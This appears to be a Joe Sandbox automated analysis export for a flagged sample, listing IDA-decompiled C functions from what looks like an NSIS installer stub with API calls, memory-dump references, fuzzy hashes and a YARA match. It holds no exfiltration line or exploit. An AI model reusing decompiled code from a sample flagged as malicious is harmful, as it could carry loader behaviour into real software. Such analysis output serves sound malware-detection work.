                                                              C-Code - Quality: 100%
                                                              			E004035F8(long _a4) {
                                                              				long _t2;
                                                              
                                                              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                              				return _t2;
                                                              			}




                                                              0x00403606
                                                              0x0040360c

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004045F9(int _a4) {
                                                              				long _t2;
                                                              
                                                              				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                              				return _t2;
                                                              			}




                                                              0x00404607
                                                              0x0040460d

                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                              • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                              • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                              • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405C8E(struct _SHELLEXECUTEINFOW* _a4) {
                                                              				struct _SHELLEXECUTEINFOW* _t4;
                                                              				int _t5;
                                                              
                                                              				_t4 = _a4;
                                                              				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                              				_t4->cbSize = 0x3c; // executed
                                                              				_t5 = ShellExecuteExW(_t4); // executed
                                                              				return _t5;
                                                              			}





                                                              0x00405c8e
                                                              0x00405c93
                                                              0x00405c97
                                                              0x00405c9d
                                                              0x00405ca3

                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 00405C9D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID:
                                                              • API String ID: 587946157-0
                                                              • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                              • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                              • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                              • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004045E6(int _a4) {
                                                              				int _t2;
                                                              
                                                              				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                              				return _t2;
                                                              			}




                                                              0x004045f0
                                                              0x004045f6

                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                              • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                              • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                              • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004014D7(intOrPtr __edx) {
                                                              				long _t3;
                                                              				void* _t7;
                                                              				intOrPtr _t10;
                                                              				void* _t13;
                                                              
                                                              				_t10 = __edx;
                                                              				_t3 = E00402D84(_t7);
                                                              				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                              				if(_t3 <= 1) {
                                                              					_t3 = 1;
                                                              				}
                                                              				Sleep(_t3); // executed
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                              				return 0;
                                                              			}







                                                              0x004014d7
                                                              0x004014d8
                                                              0x004014e1
                                                              0x004014e4
                                                              0x004014e8
                                                              0x004014e8
                                                              0x004014ea
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                              • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                              • Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                              • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E6F6712BB() {
                                                              				void* _t3;
                                                              
                                                              				_t3 = GlobalAlloc(0x40,  *0x6f67506c +  *0x6f67506c); // executed
                                                              				return _t3;
                                                              			}




                                                              0x6f6712c5
                                                              0x6f6712cb

                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,6F6712DB,?,6F67137F,00000019,6F6711CA,-000000A0), ref: 6F6712C5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: f9146e42b0b4a6cc7231de2fa5d24b6b61fb4848c9edc4183062f20c99d40d01
                                                              • Instruction ID: 2de95845178270b980d0aebd8115a2b7e1fd5d57503a5371305f0a05183fb493
                                                              • Opcode Fuzzy Hash: f9146e42b0b4a6cc7231de2fa5d24b6b61fb4848c9edc4183062f20c99d40d01
                                                              • Instruction Fuzzy Hash: 1EB01270A00510DFEF04CB69CC0AF3432D4F701311F044040F600C0180D6606C208534
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				long _v16;
                                                              				long _v20;
                                                              				long _v24;
                                                              				char _v28;
                                                              				intOrPtr _v32;
                                                              				long _v36;
                                                              				char _v40;
                                                              				unsigned int _v44;
                                                              				signed int _v48;
                                                              				WCHAR* _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				WCHAR* _v72;
                                                              				void _v76;
                                                              				struct HWND__* _v80;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t82;
                                                              				long _t87;
                                                              				short* _t89;
                                                              				void* _t95;
                                                              				signed int _t96;
                                                              				int _t109;
                                                              				signed short _t114;
                                                              				signed int _t118;
                                                              				struct HWND__** _t122;
                                                              				intOrPtr* _t138;
                                                              				WCHAR* _t146;
                                                              				unsigned int _t150;
                                                              				signed int _t152;
                                                              				unsigned int _t156;
                                                              				signed int _t158;
                                                              				signed int* _t159;
                                                              				signed int* _t160;
                                                              				struct HWND__* _t166;
                                                              				struct HWND__* _t167;
                                                              				int _t169;
                                                              				unsigned int _t197;
                                                              
                                                              				_t156 = __edx;
                                                              				_t82 =  *0x422720; // 0x59d07c
                                                              				_v32 = _t82;
                                                              				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                              				if(_a8 == 0x40b) {
                                                              					E00405CAC(0x3fb, _t146);
                                                              					E004068EF(_t146);
                                                              				}
                                                              				_t167 = _a4;
                                                              				if(_a8 != 0x110) {
                                                              					L8:
                                                              					if(_a8 != 0x111) {
                                                              						L20:
                                                              						if(_a8 == 0x40f) {
                                                              							L22:
                                                              							_v8 = _v8 & 0x00000000;
                                                              							_v12 = _v12 & 0x00000000;
                                                              							E00405CAC(0x3fb, _t146);
                                                              							if(E0040603F(_t186, _t146) == 0) {
                                                              								_v8 = 1;
                                                              							}
                                                              							E00406668(0x421718, _t146);
                                                              							_t87 = E00406A35(1);
                                                              							_v16 = _t87;
                                                              							if(_t87 == 0) {
                                                              								L30:
                                                              								E00406668(0x421718, _t146);
                                                              								_t89 = E00405FE2(0x421718);
                                                              								_t158 = 0;
                                                              								if(_t89 != 0) {
                                                              									 *_t89 = 0;
                                                              								}
                                                              								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                              									goto L35;
                                                              								} else {
                                                              									_t169 = 0x400;
                                                              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                              									asm("cdq");
                                                              									_v48 = _t109;
                                                              									_v44 = _t156;
                                                              									_v12 = 1;
                                                              									goto L36;
                                                              								}
                                                              							} else {
                                                              								_t159 = 0;
                                                              								if(0 == 0x421718) {
                                                              									goto L30;
                                                              								} else {
                                                              									goto L26;
                                                              								}
                                                              								while(1) {
                                                              									L26:
                                                              									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                              									if(_t114 != 0) {
                                                              										break;
                                                              									}
                                                              									if(_t159 != 0) {
                                                              										 *_t159 =  *_t159 & _t114;
                                                              									}
                                                              									_t160 = E00405F83(0x421718);
                                                              									 *_t160 =  *_t160 & 0x00000000;
                                                              									_t159 = _t160;
                                                              									 *_t159 = 0x5c;
                                                              									if(_t159 != 0x421718) {
                                                              										continue;
                                                              									} else {
                                                              										goto L30;
                                                              									}
                                                              								}
                                                              								_t150 = _v44;
                                                              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                              								_v44 = _t150 >> 0xa;
                                                              								_v12 = 1;
                                                              								_t158 = 0;
                                                              								__eflags = 0;
                                                              								L35:
                                                              								_t169 = 0x400;
                                                              								L36:
                                                              								_t95 = E00404F52(5);
                                                              								if(_v12 != _t158) {
                                                              									_t197 = _v44;
                                                              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                              										_v8 = 2;
                                                              									}
                                                              								}
                                                              								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                              									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                              									if(_v12 == _t158) {
                                                              										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                              									} else {
                                                              										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                              									}
                                                              								}
                                                              								_t96 = _v8;
                                                              								 *0x42a304 = _t96;
                                                              								if(_t96 == _t158) {
                                                              									_v8 = E0040140B(7);
                                                              								}
                                                              								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                              									_v8 = _t158;
                                                              								}
                                                              								E004045E6(0 | _v8 == _t158);
                                                              								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                              									E00404A0E();
                                                              								}
                                                              								 *0x423738 = _t158;
                                                              								goto L53;
                                                              							}
                                                              						}
                                                              						_t186 = _a8 - 0x405;
                                                              						if(_a8 != 0x405) {
                                                              							goto L53;
                                                              						}
                                                              						goto L22;
                                                              					}
                                                              					_t118 = _a12 & 0x0000ffff;
                                                              					if(_t118 != 0x3fb) {
                                                              						L12:
                                                              						if(_t118 == 0x3e9) {
                                                              							_t152 = 7;
                                                              							memset( &_v76, 0, _t152 << 2);
                                                              							_v80 = _t167;
                                                              							_v72 = 0x423748;
                                                              							_v60 = E00404E0B;
                                                              							_v56 = _t146;
                                                              							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                              							_t122 =  &_v80;
                                                              							_v64 = 0x41;
                                                              							__imp__SHBrowseForFolderW(_t122);
                                                              							if(_t122 == 0) {
                                                              								_a8 = 0x40f;
                                                              							} else {
                                                              								__imp__CoTaskMemFree(_t122);
                                                              								E00405F37(_t146);
                                                              								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                              								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                              									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                              									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                              										lstrcatW(_t146, 0x428200);
                                                              									}
                                                              								}
                                                              								 *0x423738 =  *0x423738 + 1;
                                                              								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                              							}
                                                              						}
                                                              						goto L20;
                                                              					}
                                                              					if(_a12 >> 0x10 != 0x300) {
                                                              						goto L53;
                                                              					}
                                                              					_a8 = 0x40f;
                                                              					goto L12;
                                                              				} else {
                                                              					_t166 = GetDlgItem(_t167, 0x3fb);
                                                              					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                              						E00405F37(_t146);
                                                              					}
                                                              					 *0x429238 = _t167;
                                                              					SetWindowTextW(_t166, _t146);
                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                              					_push(1);
                                                              					E004045C4(_t167);
                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                              					_push(0x14);
                                                              					E004045C4(_t167);
                                                              					E004045F9(_t166);
                                                              					_t138 = E00406A35(8);
                                                              					if(_t138 == 0) {
                                                              						L53:
                                                              						return E0040462B(_a8, _a12, _a16);
                                                              					} else {
                                                              						 *_t138(_t166, 1);
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              			}













































                                                              0x00404ab5
                                                              0x00404abb
                                                              0x00404ac1
                                                              0x00404ace
                                                              0x00404adc
                                                              0x00404adf
                                                              0x00404ae7
                                                              0x00404aed
                                                              0x00404aed
                                                              0x00404af9
                                                              0x00404afc
                                                              0x00404b6a
                                                              0x00404b71
                                                              0x00404c48
                                                              0x00404c4f
                                                              0x00404c5e
                                                              0x00404c5e
                                                              0x00404c62
                                                              0x00404c6c
                                                              0x00404c79
                                                              0x00404c7b
                                                              0x00404c7b
                                                              0x00404c89
                                                              0x00404c90
                                                              0x00404c97
                                                              0x00404c9a
                                                              0x00404cd6
                                                              0x00404cd8
                                                              0x00404cde
                                                              0x00404ce3
                                                              0x00404ce7
                                                              0x00404ce9
                                                              0x00404ce9
                                                              0x00404d05
                                                              0x00000000
                                                              0x00404d07
                                                              0x00404d0a
                                                              0x00404d18
                                                              0x00404d1e
                                                              0x00404d1f
                                                              0x00404d22
                                                              0x00404d25
                                                              0x00000000
                                                              0x00404d25
                                                              0x00404c9c
                                                              0x00404c9e
                                                              0x00404ca2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404ca4
                                                              0x00404ca4
                                                              0x00404cb1
                                                              0x00404cb6
                                                              0x00000000
                                                              0x00000000
                                                              0x00404cba
                                                              0x00404cbc
                                                              0x00404cbc
                                                              0x00404cc5
                                                              0x00404cc7
                                                              0x00404ccc
                                                              0x00404ccf
                                                              0x00404cd4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404cd4
                                                              0x00404d31
                                                              0x00404d3b
                                                              0x00404d3e
                                                              0x00404d41
                                                              0x00404d48
                                                              0x00404d48
                                                              0x00404d4a
                                                              0x00404d4a
                                                              0x00404d4f
                                                              0x00404d51
                                                              0x00404d59
                                                              0x00404d60
                                                              0x00404d62
                                                              0x00404d6d
                                                              0x00404d6d
                                                              0x00404d62
                                                              0x00404d7d
                                                              0x00404d87
                                                              0x00404d8f
                                                              0x00404daa
                                                              0x00404d91
                                                              0x00404d9a
                                                              0x00404d9a
                                                              0x00404d8f
                                                              0x00404daf
                                                              0x00404db4
                                                              0x00404db9
                                                              0x00404dc2
                                                              0x00404dc2
                                                              0x00404dcb
                                                              0x00404dcd
                                                              0x00404dcd
                                                              0x00404dd9
                                                              0x00404de1
                                                              0x00404deb
                                                              0x00404deb
                                                              0x00404df0
                                                              0x00000000
                                                              0x00404df0
                                                              0x00404c9a
                                                              0x00404c51
                                                              0x00404c58
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404c58
                                                              0x00404b77
                                                              0x00404b80
                                                              0x00404b9a
                                                              0x00404b9f
                                                              0x00404ba9
                                                              0x00404bb0
                                                              0x00404bbc
                                                              0x00404bbf
                                                              0x00404bc2
                                                              0x00404bc9
                                                              0x00404bd1
                                                              0x00404bd4
                                                              0x00404bd8
                                                              0x00404bdf
                                                              0x00404be7
                                                              0x00404c41
                                                              0x00404be9
                                                              0x00404bea
                                                              0x00404bf1
                                                              0x00404bfb
                                                              0x00404c03
                                                              0x00404c10
                                                              0x00404c24
                                                              0x00404c28
                                                              0x00404c28
                                                              0x00404c24
                                                              0x00404c2d
                                                              0x00404c3a
                                                              0x00404c3a
                                                              0x00404be7
                                                              0x00000000
                                                              0x00404b9f
                                                              0x00404b8d
                                                              0x00000000
                                                              0x00000000
                                                              0x00404b93
                                                              0x00000000
                                                              0x00404afe
                                                              0x00404b0b
                                                              0x00404b14
                                                              0x00404b21
                                                              0x00404b21
                                                              0x00404b28
                                                              0x00404b2e
                                                              0x00404b37
                                                              0x00404b3a
                                                              0x00404b3d
                                                              0x00404b45
                                                              0x00404b48
                                                              0x00404b4b
                                                              0x00404b51
                                                              0x00404b58
                                                              0x00404b5f
                                                              0x00404df6
                                                              0x00404e08
                                                              0x00404b65
                                                              0x00404b68
                                                              0x00000000
                                                              0x00404b68
                                                              0x00404b5f

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                              • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                              • API String ID: 2624150263-3840399979
                                                              • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                              • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                              • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                              • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: Ebw$s=v|$&R{
                                                              • API String ID: 1029625771-2967133819
